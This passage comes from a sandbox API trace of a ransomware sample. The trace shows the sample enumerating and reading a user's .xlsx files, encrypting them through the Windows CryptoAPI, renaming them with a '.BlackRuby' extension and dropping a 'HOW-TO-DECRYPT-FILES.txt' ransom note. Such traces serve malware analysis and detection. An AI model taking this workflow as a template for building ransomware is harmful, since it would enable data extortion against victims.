lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.448] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.448] GetLastError () returned 0x12 [0057.449] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.449] GetLastError () returned 0x12 [0057.449] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.449] GetLastError () returned 0x12 [0057.449] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.449] GetLastError () returned 0x12 [0057.449] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.449] GetLastError () returned 0x12 [0057.449] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0057.449] GetLastError () returned 0x12 [0057.449] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0057.449] GetLastError () returned 0x12 [0057.449] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0057.449] SetErrorMode (uMode=0x0) returned 0x1 [0057.449] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", lpFilePart=0x0) returned 0x2f [0057.449] GetLastError () returned 0x12 [0057.449] SetErrorMode (uMode=0x1) returned 0x0 [0057.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1haopxcl7ho5 r1.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1d1005c | out: lpFileInformation=0x1d1005c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4beb30, ftCreationTime.dwHighDateTime=0x1d32f72, ftLastAccessTime.dwLowDateTime=0xeaf71480, ftLastAccessTime.dwHighDateTime=0x1d36260, ftLastWriteTime.dwLowDateTime=0xeaf71480, ftLastWriteTime.dwHighDateTime=0x1d36260, nFileSizeHigh=0x0, nFileSizeLow=0x514e)) returned 1 [0057.449] GetLastError () returned 0x12 [0057.449] SetErrorMode (uMode=0x0) returned 0x1 [0057.449] GetLastError () returned 0x12 [0057.449] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", lpFilePart=0x0) returned 0x2f [0057.449] GetLastError () returned 0x12 [0057.449] SetErrorMode (uMode=0x1) returned 0x0 [0057.449] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1haopxcl7ho5 r1.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.449] GetLastError () returned 0x0 [0057.449] GetFileType (hFile=0x184) returned 0x1 [0057.450] SetErrorMode (uMode=0x0) returned 0x1 [0057.450] GetFileType (hFile=0x184) returned 0x1 [0057.450] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x514e [0057.450] GetLastError () returned 0x0 [0057.450] ReadFile (in: hFile=0x184, lpBuffer=0x1d11efc, nNumberOfBytesToRead=0x514e, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1d11efc*, lpNumberOfBytesRead=0x18ed84*=0x514e, lpOverlapped=0x0) returned 1 [0057.450] GetLastError () returned 0x0 [0057.451] CloseHandle (hObject=0x184) returned 1 [0057.451] GetLastError () returned 0x0 [0057.451] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", lpFilePart=0x0) returned 0x2f [0057.451] GetLastError () returned 0x0 [0057.451] SetErrorMode (uMode=0x1) returned 0x0 [0057.451] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1haopxcl7ho5 r1.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4beb30, ftCreationTime.dwHighDateTime=0x1d32f72, ftLastAccessTime.dwLowDateTime=0xeaf71480, ftLastAccessTime.dwHighDateTime=0x1d36260, ftLastWriteTime.dwLowDateTime=0xeaf71480, ftLastWriteTime.dwHighDateTime=0x1d36260, nFileSizeHigh=0x0, nFileSizeLow=0x514e)) returned 1 [0057.451] GetLastError () returned 0x0 [0057.451] SetErrorMode (uMode=0x0) returned 0x1 [0057.451] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0057.451] GetLastError () returned 0x0 [0057.489] CryptImportKey (in: hProv=0x37c790, pbData=0x1b7cd14, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360d20) returned 1 [0057.489] GetLastError () returned 0x0 [0057.489] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.489] GetLastError () returned 0x0 [0057.494] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.494] GetLastError () returned 0x0 [0057.494] CryptDuplicateKey (in: hKey=0x360d20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0057.494] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.494] GetLastError () returned 0x0 [0057.495] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1ba9d60*=0x1, dwFlags=0x0) returned 1 [0057.495] GetLastError () returned 0x0 [0057.495] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1ba9d2c, dwFlags=0x0) returned 1 [0057.495] GetLastError () returned 0x0 [0057.495] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba9da8*, pdwDataLen=0x18ed74*=0x5240, dwBufLen=0x5240 | out: pbData=0x1ba9da8*, pdwDataLen=0x18ed74*=0x5240) returned 1 [0057.495] GetLastError () returned 0x0 [0057.495] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb4254*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1bb4254*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.495] GetLastError () returned 0x0 [0057.495] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb4284*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1bb4284*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.495] GetLastError () returned 0x0 [0057.495] CryptDestroyKey (hKey=0x360d20) returned 1 [0057.495] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.495] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0057.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", lpFilePart=0x0) returned 0x2f [0057.495] GetLastError () returned 0x0 [0057.495] SetErrorMode (uMode=0x1) returned 0x0 [0057.495] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1haopxcl7ho5 r1.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.496] GetLastError () returned 0xb7 [0057.496] GetFileType (hFile=0x184) returned 0x1 [0057.496] SetErrorMode (uMode=0x0) returned 0x1 [0057.496] GetFileType (hFile=0x184) returned 0x1 [0057.497] CloseHandle (hObject=0x184) returned 1 [0057.497] GetLastError () returned 0xb7 [0057.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx", lpFilePart=0x0) returned 0x2f [0057.497] GetLastError () returned 0xb7 [0057.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_zlEkVtHj1CZJnm5cfyWZA8N6zkVgwzJlrxmSOUBtiPY2.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_zlEkVtHj1CZJnm5cfyWZA8N6zkVgwzJlrxmSOUBtiPY2.BlackRuby", lpFilePart=0x0) returned 0x5b [0057.497] GetLastError () returned 0xb7 [0057.497] SetErrorMode (uMode=0x1) returned 0x0 [0057.497] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1haopxcl7ho5 r1.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4beb30, ftCreationTime.dwHighDateTime=0x1d32f72, ftLastAccessTime.dwLowDateTime=0xeaf71480, ftLastAccessTime.dwHighDateTime=0x1d36260, ftLastWriteTime.dwLowDateTime=0x2a76dc40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5250)) returned 1 [0057.497] GetLastError () returned 0xb7 [0057.497] SetErrorMode (uMode=0x0) returned 0x1 [0057.498] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\1hAoPXCl7hO5 r1.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1haopxcl7ho5 r1.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_zlEkVtHj1CZJnm5cfyWZA8N6zkVgwzJlrxmSOUBtiPY2.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_zlekvthj1czjnm5cfywza8n6zkvgwzjlrxmsoubtipy2.blackruby")) returned 1 [0057.498] GetLastError () returned 0xb7 [0057.498] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.498] GetLastError () returned 0xb7 [0057.498] SetErrorMode (uMode=0x1) returned 0x0 [0057.498] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.499] GetLastError () returned 0x0 [0057.499] GetFileType (hFile=0x184) returned 0x1 [0057.499] SetErrorMode (uMode=0x0) returned 0x1 [0057.499] GetFileType (hFile=0x184) returned 0x1 [0057.500] CloseHandle (hObject=0x184) returned 1 [0057.500] GetLastError () returned 0x0 [0057.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.500] GetLastError () returned 0x0 [0057.500] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0057.500] GetLastError () returned 0x0 [0057.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", lpFilePart=0x0) returned 0x2e [0057.500] GetLastError () returned 0x0 [0057.500] SetErrorMode (uMode=0x1) returned 0x0 [0057.500] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1zq tissvcz_i8.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1be0728 | out: lpFileInformation=0x1be0728*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc6b140, ftCreationTime.dwHighDateTime=0x1d353a9, ftLastAccessTime.dwLowDateTime=0xee4e6b0, ftLastAccessTime.dwHighDateTime=0x1d3549c, ftLastWriteTime.dwLowDateTime=0xee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d3549c, nFileSizeHigh=0x0, nFileSizeLow=0x122bd)) returned 1 [0057.500] GetLastError () returned 0x0 [0057.500] SetErrorMode (uMode=0x0) returned 0x1 [0057.501] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", lpFilePart=0x0) returned 0x2e [0057.501] GetLastError () returned 0x0 [0057.501] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", lpFilePart=0x0) returned 0x2e [0057.501] GetLastError () returned 0x0 [0057.501] SetErrorMode (uMode=0x1) returned 0x0 [0057.501] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1zq tissvcz_i8.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.501] GetLastError () returned 0x0 [0057.501] GetFileType (hFile=0x184) returned 0x1 [0057.501] SetErrorMode (uMode=0x0) returned 0x1 [0057.501] GetFileType (hFile=0x184) returned 0x1 [0057.501] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x122bd [0057.501] GetLastError () returned 0x0 [0057.501] ReadFile (in: hFile=0x184, lpBuffer=0x1be24e8, nNumberOfBytesToRead=0x122bd, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1be24e8*, lpNumberOfBytesRead=0x18ed84*=0x122bd, lpOverlapped=0x0) returned 1 [0057.502] GetLastError () returned 0x0 [0057.502] CloseHandle (hObject=0x184) returned 1 [0057.502] GetLastError () returned 0x0 [0057.502] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", lpFilePart=0x0) returned 0x2e [0057.502] GetLastError () returned 0x0 [0057.502] SetErrorMode (uMode=0x1) returned 0x0 [0057.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1zq tissvcz_i8.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc6b140, ftCreationTime.dwHighDateTime=0x1d353a9, ftLastAccessTime.dwLowDateTime=0xee4e6b0, ftLastAccessTime.dwHighDateTime=0x1d3549c, ftLastWriteTime.dwLowDateTime=0xee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d3549c, nFileSizeHigh=0x0, nFileSizeLow=0x122bd)) returned 1 [0057.502] GetLastError () returned 0x0 [0057.502] SetErrorMode (uMode=0x0) returned 0x1 [0057.502] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c680) returned 1 [0057.502] GetLastError () returned 0x0 [0057.537] CryptImportKey (in: hProv=0x37c680, pbData=0x1c60e28, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360de0) returned 1 [0057.537] GetLastError () returned 0x0 [0057.537] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.537] GetLastError () returned 0x0 [0057.542] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.542] GetLastError () returned 0x0 [0057.542] CryptDuplicateKey (in: hKey=0x360de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360da0) returned 1 [0057.542] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.542] GetLastError () returned 0x0 [0057.542] CryptSetKeyParam (hKey=0x360da0, dwParam=0x4, pbData=0x1c8de74*=0x1, dwFlags=0x0) returned 1 [0057.542] GetLastError () returned 0x0 [0057.542] CryptSetKeyParam (hKey=0x360da0, dwParam=0x1, pbData=0x1c8de40, dwFlags=0x0) returned 1 [0057.542] GetLastError () returned 0x0 [0057.542] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c8debc*, pdwDataLen=0x18ed74*=0x123b0, dwBufLen=0x123b0 | out: pbData=0x1c8debc*, pdwDataLen=0x18ed74*=0x123b0) returned 1 [0057.542] GetLastError () returned 0x0 [0057.542] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb2648*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cb2648*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0057.542] GetLastError () returned 0x0 [0057.542] CryptEncrypt (in: hKey=0x360da0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cb2678*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cb2678*, pdwDataLen=0x18ed94*=0x10) returned 1 [0057.542] GetLastError () returned 0x0 [0057.543] CryptDestroyKey (hKey=0x360de0) returned 1 [0057.543] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.543] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0057.543] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", lpFilePart=0x0) returned 0x2e [0057.543] GetLastError () returned 0x0 [0057.543] SetErrorMode (uMode=0x1) returned 0x0 [0057.543] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1zq tissvcz_i8.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.544] GetLastError () returned 0xb7 [0057.544] GetFileType (hFile=0x184) returned 0x1 [0057.544] SetErrorMode (uMode=0x0) returned 0x1 [0057.545] GetFileType (hFile=0x184) returned 0x1 [0057.546] CloseHandle (hObject=0x184) returned 1 [0057.546] GetLastError () returned 0xb7 [0057.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx", lpFilePart=0x0) returned 0x2e [0057.546] GetLastError () returned 0xb7 [0057.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_mcGyZxrYKpGcFfQNoFioh5ngDAdfnLhe3NoNQXr.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Encrypted_mcGyZxrYKpGcFfQNoFioh5ngDAdfnLhe3NoNQXr.BlackRuby", lpFilePart=0x0) returned 0x56 [0057.546] GetLastError () returned 0xb7 [0057.546] SetErrorMode (uMode=0x1) returned 0x0 [0057.546] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1zq tissvcz_i8.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc6b140, ftCreationTime.dwHighDateTime=0x1d353a9, ftLastAccessTime.dwLowDateTime=0xee4e6b0, ftLastAccessTime.dwHighDateTime=0x1d3549c, ftLastWriteTime.dwLowDateTime=0x2a7e0060, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x123c0)) returned 1 [0057.546] GetLastError () returned 0xb7 [0057.546] SetErrorMode (uMode=0x0) returned 0x1 [0057.546] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\1zq tissvCZ_i8.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\1zq tissvcz_i8.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Encrypted_mcGyZxrYKpGcFfQNoFioh5ngDAdfnLhe3NoNQXr.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\encrypted_mcgyzxrykpgcffqnofioh5ngdadfnlhe3nonqxr.blackruby")) returned 1 [0057.547] GetLastError () returned 0xb7 [0057.547] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0057.547] GetLastError () returned 0xb7 [0057.547] SetErrorMode (uMode=0x1) returned 0x0 [0057.547] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.547] GetLastError () returned 0x5 [0057.548] SetErrorMode (uMode=0x0) returned 0x1 [0057.548] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", lpFilePart=0x0) returned 0x33 [0057.548] GetLastError () returned 0x5 [0057.548] SetErrorMode (uMode=0x1) returned 0x0 [0057.548] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2j9rrip nyhsfaczpia.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1ce1b64 | out: lpFileInformation=0x1ce1b64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x889050d0, ftCreationTime.dwHighDateTime=0x1d35398, ftLastAccessTime.dwLowDateTime=0x4d3d6fc0, ftLastAccessTime.dwHighDateTime=0x1d34d0a, ftLastWriteTime.dwLowDateTime=0x4d3d6fc0, ftLastWriteTime.dwHighDateTime=0x1d34d0a, nFileSizeHigh=0x0, nFileSizeLow=0xf2b3)) returned 1 [0057.548] GetLastError () returned 0x5 [0057.548] SetErrorMode (uMode=0x0) returned 0x1 [0057.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", lpFilePart=0x0) returned 0x33 [0057.549] GetLastError () returned 0x5 [0057.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx", lpFilePart=0x0) returned 0x33 [0057.549] GetLastError () returned 0x5 [0057.549] SetErrorMode (uMode=0x1) returned 0x0 [0057.549] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2j9RrIP nYhsFAcZPIA.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\2j9rrip nyhsfaczpia.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.549] GetLastError () returned 0x0 [0057.549] GetFileType (hFile=0x184) returned 0x1 [0057.549] SetErrorMode (uMode=0x0) returned 0x1 [0057.549] GetFileType (hFile=0x184) returned 0x1 [0057.549] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0xf2b3 [0057.549] GetLastError () returned 0x0 [0057.549] ReadFile (in: hFile=0x184, lpBuffer=0x1ce3abc, nNumberOfBytesToRead=0xf2b3, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1ce3abc*, lpNumberOfBytesRead=0x18ed84*=0xf2b3, lpOverlapped=0x0) returned 1 [0057.550] GetLastError () returned 0x0 [0057.550] CloseHandle (hObject=0x184) returned 1 [0057.550] GetLastError () returned 0x0 [0057.550] GetFullPathNameW (in: 